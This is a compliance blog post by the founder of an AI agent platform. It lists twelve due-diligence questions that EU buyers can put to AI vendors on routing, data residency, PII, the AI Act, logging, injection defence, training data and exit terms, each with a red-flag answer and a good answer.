← All insights
ComplianceMay 26, 20265 min read

AI Vendor Due Diligence for EU Buyers: 12 Questions That Save You a Year of Pain

Share
Article cover placeholder

TL;DR

12 AI-specific procurement questions every EU buyer should ask before signing: model routing, data residency, PII handling, AI Act classification, audit logs, deprecation, injection defence, training data, no-training commitment, incident response, change management, and exit patterns.

AI Vendor Due Diligence for EU Buyers: 12 Questions That Save You a Year of Pain

Procurement teams have mature templates for SaaS vendor due diligence. SOC 2, ISO 27001, GDPR Article 28 processor terms, data residency. Those questions still matter. They are not enough for AI vendors. The AI-specific risks — model provider chains, training data exposure, output liability, model deprecation, EU AI Act conformity — need their own due diligence pass.

These are the 12 questions to add to every AI vendor evaluation. With what good answers look like and what the red-flag answers sound like.

1. Who are your model providers and what is your routing logic?

A serious AI vendor uses multiple model providers and routes per task. They name the providers (OpenAI, Anthropic, Google, Mistral, plus their own self-hosted options), describe the routing logic per workflow, and let you configure it for your data sensitivity.

Red flag: "We use the best models for the job." That tells you nothing.

Good answer: a sub-processor list per workflow type, a routing policy you can review, and the ability to constrain routing to specific providers or geographies for your data.

2. What is your data residency story per data category?

Not "we are EU-hosted." Per data category, where does the data live at rest, where does it move in transit, and which sub-processors see it.

Red flag: a single bullet point saying EU-hosted without specifying which infrastructure, which sub-processors, and what happens when a model provider's region is unavailable.

Good answer: a data flow diagram per workflow, named regions, named sub-processors, failover behaviour documented, and the ability to constrain residency per workspace.

3. How is PII detected and handled before reaching third-party models?

For any vendor using third-party LLMs to process your personal data, the detection and redaction (or routing) of PII is the single biggest TIA question.

Red flag: "We rely on the model provider's data protection commitments."

Good answer: gateway-side PII detection with measurable precision and recall, redaction or routing rules per data category, and audit log entries showing the redaction operation per prompt.

4. What is your EU AI Act risk classification posture?

The vendor should know whether their system is high-risk under Annex III or II, whether you (the deployer) inherit obligations, and what conformity assessment work they have done.

Red flag: "We are working on it" or "The AI Act doesn't really apply to us."

Good answer: a classification analysis per use case the vendor enables, the conformity assessment status (planned, in progress, completed) where applicable, the technical documentation file structure, and the deployer guidance that helps you with your own obligations.

5. What audit-log evidence do you produce per inference?

For both AI Act Article 12 record-keeping and your own GDPR accountability, the audit log content matters.

Red flag: "We log API calls."

Good answer: per-inference records with timestamp, input (or PII-redacted hash of input), prompt template version, model and version, output, the human approval or override, retention policy, and export format. See our Article 12 logging guide for the full content checklist.

6. How do you handle model deprecation?

Model providers deprecate models. Your vendor's agents are tuned to specific models. When the model goes away, what happens to the agent?

Red flag: "We will figure it out when it happens."

Good answer: a documented deprecation handling process, a model abstraction layer that allows substitution without rewriting agents, prior experience with deprecations (the vendor names them and describes how they handled them), and a notice period to you for any deprecation that affects your workflows.

7. What is your prompt and tool injection defence?

Agentic systems that can be tricked into running unintended actions are a real risk. Especially for agents with tool access (writing to systems, sending messages, executing code).

Red flag: "Our prompts are robust" with no specifics.

Good answer: documented defence layers (prompt isolation, output validation, tool access controls, content moderation, anomaly detection), a published responsible disclosure program, and recent test results from internal or external red-teaming.

8. What is the training data provenance for models you operate?

For self-hosted models or fine-tunes the vendor provides, the training data provenance affects your copyright exposure and your bias profile.

Red flag: vague answers about "publicly available data."

Good answer: documented training data sources, opt-out compliance status, licence audit, and the bias evaluation methodology the vendor uses. Less applicable if the vendor only routes to third-party models, more critical if they ship their own.

9. How do you handle customer data in training?

Your data should not train someone else's model unless you explicitly opted in. This is a common gotcha in the standard terms.

Red flag: silence on this in the DPA, or an opt-out buried in a sub-clause.

Good answer: explicit no-training-on-customer-data commitment as a default, opt-in (not opt-out) for any use of customer data in model improvement, and audit rights to verify.

10. What does your incident response look like for AI-specific incidents?

Standard cyber incident response is well-defined. AI-specific incidents (prompt injection that exfiltrates data, model hallucination causing material harm to a customer, bias issues surfaced in production) have their own response patterns.

Red flag: AI incidents handled by the generic incident response with no AI-specific runbook.

Good answer: AI-specific incident classification, a runbook that includes model rollback / disable, customer notification timeline, regulator notification triggers under the AI Act, and post-incident reporting.

11. What is your model versioning and change-management practice?

When the vendor updates a model or a prompt, what changes do you see? When is your DPIA or conformity assessment invalidated?

Red flag: "We continuously improve our models" with no notification practice.

Good answer: documented versioning of models and prompts, change notifications to customers for material changes, change classification (immaterial vs material), and the policy that gives you time to re-assess before a material change rolls out.

12. What is your exit pattern?

Can you get your data out, including the agent definitions and audit logs, in a usable format if you leave?

Red flag: data exports limited to the agent outputs, no export of the agent definitions or knowledge base.

Good answer: documented data portability covering customer data, agent definitions, knowledge base content, audit logs, and the export format and timeline. Plus a transition plan that does not leave you stranded.

How to use the 12 questions

Send them in the RFI. The answers tell you two things: whether the vendor has thought about AI-specific risks, and whether they have built the controls or are bluffing. A vendor that struggles with these questions in 2026 is a vendor whose product was built before the regulatory landscape shifted; they may catch up, but their roadmap is the risk you are buying.

The vendors who answer well will not be the cheapest. They will be the ones whose contract you actually sign without a six-month security and compliance negotiation, and whose system survives your first regulator inspection without rework.

About the author

· Founder, AgentWorks

Erwin Berkouwer is the founder of AgentWorks — an AI agent platform purpose-built for European teams that need EU AI Act-ready governance, multi-LLM choice across OpenAI, Anthropic, Google and Mistral, and transparent per-token € pricing.

Read more about Erwin